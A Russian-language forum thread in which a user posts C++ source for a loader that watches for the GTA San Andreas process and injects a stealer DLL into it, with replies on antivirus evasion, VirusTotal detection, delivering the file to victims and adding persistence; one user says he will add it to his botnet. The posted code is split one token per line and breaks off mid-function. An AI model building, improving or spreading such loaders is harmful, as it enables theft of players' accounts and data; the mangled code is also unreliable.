PDA

Просмотр полной версии : .exe загрузчик стиллера


Vadim.dll
09.05.2019, 20:13
Тема создана в целях познания. Делал чисто из-за того, чтобы получить опыт.

Сделал .exe загрузчик стиллера, который следит за процессом гта са и если таковой имеется, вшивает туда стиллер.

C++:





[CODE]
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//Library needed by Linker to check file existance
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "WinInet.lib")
#pragma comment (lib, "urlmon.lib")
using
namespace
std
;
DWORD
GetProcId
(
const
wchar_t
*
procname
)
{
PROCESSENTRY32 pe
;
HANDLE hSnap
;
pe
.
dwSize
=
sizeof
(
PROCESSENTRY32
)
;
hSnap
=
CreateToolhelp32Snapshot
(
TH32CS_SNAPPROCESS
,
NULL
)
;
if
(
Process32First
(
hSnap
,
&
pe
)
)
{
do
{
if
(
wcscmp
(
pe
.
szExeFile
,
procname
)
==
0
)
return
pe
.
th32ProcessID
;
;
}
while
(
Process32Next
(
hSnap
,
&
pe
)
)
;
}
return
(
DWORD
)
0
;
}
bool
InjectDLL
(
const
int
&
pid
,
const
string
&
DLL_Path
)
{
long
dll_size
=
DLL_Path
.
length
(
)
+
1
;
HANDLE hProc
=
OpenProcess
(
PROCESS_ALL_ACCESS
,
FALSE
,
pid
)
;
if
(
hProc
==
NULL
)
{
cerr



Палится антистиллером от даркпискеля. Плюсы здесь в том, что стиллер работает на чистой gta_sa без всяких asi_loader, sampfuncs. Еще плюс в том, что если юзер снесет гта и поставит заново, стиллер продолжит работать. Плюс отправляет логи уже после того, как юзер закрывает гта. Также модернизировал немного паблик аси стиллер, чтобы логи складировал в txt файл и удалил лишнюю шнягу. Исходники тоже могу скинуть, кому интересно. Работает на R1/R2. Для R3 оффсеты не смог извлечь из игры т.к я баран.

P.S Не мешало бы доделать, чтобы он прятался тоже где-то в temp папке и сам себя добавил в автозагрузку

P.S.S И вообще, можно ведь сделать .exe стиллер не вшивая .asi стиллер в игру, а напрямую взаимодействуя с процессом

Вопрос к знающим, если я записываю путь к temp папке в char, а не WCHAR, значит ли это, что если у юзера в пути к temp папке содержатся русские символы, то будет беда?

ImPasha
09.05.2019, 21:10
Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo

Кстати, rghost заблокирован в России. Файл не будет загружаться.

Vadim.dll
09.05.2019, 21:20
Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo
Кстати, rghost заблокирован в России. Файл не будет загружаться.


это прототип, логирование для дебага

suic1de666
09.05.2019, 22:16
Нормас, добавлю в свой ботнет :)

osminog
09.05.2019, 22:42
Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo
Кстати, rghost заблокирован в России. Файл не будет загружаться.


VPN в помощь

ImPasha
09.05.2019, 22:44
VPN в помощь


Я про то, что жертва не сможет скачать файл

Vadim.dll
09.05.2019, 22:49
Я про то, что жертва не сможет скачать файл


Тут не обязательно юзать rghost, можешь хоть со своего сервака грузить

atizoff
09.05.2019, 23:05
вирустотал ахуевает от этого?

ALF
09.05.2019, 23:15
вирустотал ахуевает от этого?


вирус тотал будет от любого файла ахуевать... если юзеры будут лить их туда

в теме ошибка, это не exe стиллер, а лоадер.

atizoff
09.05.2019, 23:17
вирус тотал будет от любого файла ахуевать... если юзеры будут лить их туда

в теме ошибка, это не exe стиллер, а лоадер.


ну не напишет же читу он stealler

ALF
09.05.2019, 23:18
Вопрос к знающим, если я записываю путь к temp папке в char, а не WCHAR, значит ли это, что если у юзера в пути к temp папке содержатся русские символы, то будет беда?


не должно

Код:






char szPath[MAX_PATH] = { 0 };
GetTempPath(sizeof(szPath), szPath);

Vadim.dll
09.05.2019, 23:26
вирус тотал будет от любого файла ахуевать... если юзеры будут лить их туда

в теме ошибка, это не exe стиллер, а лоадер.


Поправил :)



вирустотал ахуевает от этого?


На вирустотале 3 из 73 антивирусов ругаются

osminog
09.05.2019, 23:47
Я про то, что жертва не сможет скачать файл


А если жертва с Украины?

Azller Lollison
10.05.2019, 02:30
Поправил :)

На вирустотале 3 из 73 антивирусов ругаются


чекни теперь через пару дней/недель этот же файл, ахуеешь :)

Losososo
10.05.2019, 06:13
Поправил :)

На вирустотале 3 из 73 антивирусов ругаются


Никогда не проверяй на вт файлы, которые не хочешь чтобы были детект.

ImPasha
10.05.2019, 07:45
Никогда не проверяй на вт файлы, которые не хочешь чтобы были детект.


Их проверят другие

Losososo
10.05.2019, 09:30
Их проверят другие


Самп комьюнити не знает что такое вт, так что вряд ли

Jfhhd
10.05.2019, 12:16
Самп комьюнити не знает что такое вт, так что вряд ли


Я самый первый лоадер словил,он не палится на VT ни встроенными антивирусами,благо потерял не так много и загруженный файл антивирус вычислил

xsilv
10.05.2019, 12:17
Самп комьюнити не знает что такое вт, так что вряд ли


самп комьюнити только о вт и пиздит, когда дело даже клео касается